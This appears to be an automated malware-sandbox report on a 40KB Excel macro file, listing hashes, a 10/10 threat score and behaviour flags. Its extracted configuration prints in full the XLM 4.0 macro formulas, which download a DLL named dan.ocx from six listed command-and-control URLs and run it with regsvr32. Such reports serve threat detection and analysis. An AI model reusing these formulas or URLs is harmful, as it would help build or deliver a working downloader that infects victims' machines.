Overview

overview

10

Static

static

10

5083018ea9...9.xlsm

windows7-x64

10

5083018ea9...9.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    5083018ea9154b9becdf566b66ab725d56de182f2af9cd69bcd46383b9425419

  • Size

    40KB

  • Sample

    241120-pq7ytawfrd

  • MD5

    87a1c5bd3f5bef714ab8ab4d8155d261

  • SHA1

    9a51be90a17a0e5d5fe469e45a7a0d0b52648429

  • SHA256

    5083018ea9154b9becdf566b66ab725d56de182f2af9cd69bcd46383b9425419

  • SHA512

    569404ebf87fe5e436b675019880719c15959db0b880e2999775647ab6ddaf524e0b756485382d3bd5aaee29c7dd338e9b1910f2dc2bc73db9eaeaaf1adfe941

  • SSDEEP

    768:5qoOomihd8DOevZCwtofyKfcrND59V+L9Rw4eWrXcTqZ0VfIeg:XOom8eDGylND59V4jwmXc2CVfIb

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://asempaye.com/404/zREXldL8ZfpsEepiC/

https://freesoft18.com/urq/dd1s9WyDLkdM/

https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/

https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/

https://pedroribeiro.work/wp-admin/qOkQQ/

https://hojeemdia.life/detector/klwHgC9eat/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://asempaye.com/404/zREXldL8ZfpsEepiC/","..\dan.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://freesoft18.com/urq/dd1s9WyDLkdM/","..\dan.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/","..\dan.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/","..\dan.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://pedroribeiro.work/wp-admin/qOkQQ/","..\dan.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://hojeemdia.life/detector/klwHgC9eat/","..\dan.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\dan.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://asempaye.com/404/zREXldL8ZfpsEepiC/
xlm40.dropper

https://freesoft18.com/urq/dd1s9WyDLkdM/
xlm40.dropper

https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/
xlm40.dropper

https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/
xlm40.dropper

https://pedroribeiro.work/wp-admin/qOkQQ/
xlm40.dropper

https://hojeemdia.life/detector/klwHgC9eat/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://asempaye.com/404/zREXldL8ZfpsEepiC/

Targets

    • Target

      5083018ea9154b9becdf566b66ab725d56de182f2af9cd69bcd46383b9425419

    • Size

      40KB

    • MD5

      87a1c5bd3f5bef714ab8ab4d8155d261

    • SHA1

      9a51be90a17a0e5d5fe469e45a7a0d0b52648429

    • SHA256

      5083018ea9154b9becdf566b66ab725d56de182f2af9cd69bcd46383b9425419

    • SHA512

      569404ebf87fe5e436b675019880719c15959db0b880e2999775647ab6ddaf524e0b756485382d3bd5aaee29c7dd338e9b1910f2dc2bc73db9eaeaaf1adfe941

    • SSDEEP

      768:5qoOomihd8DOevZCwtofyKfcrND59V+L9Rw4eWrXcTqZ0VfIeg:XOom8eDGylND59V4jwmXc2CVfIb

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks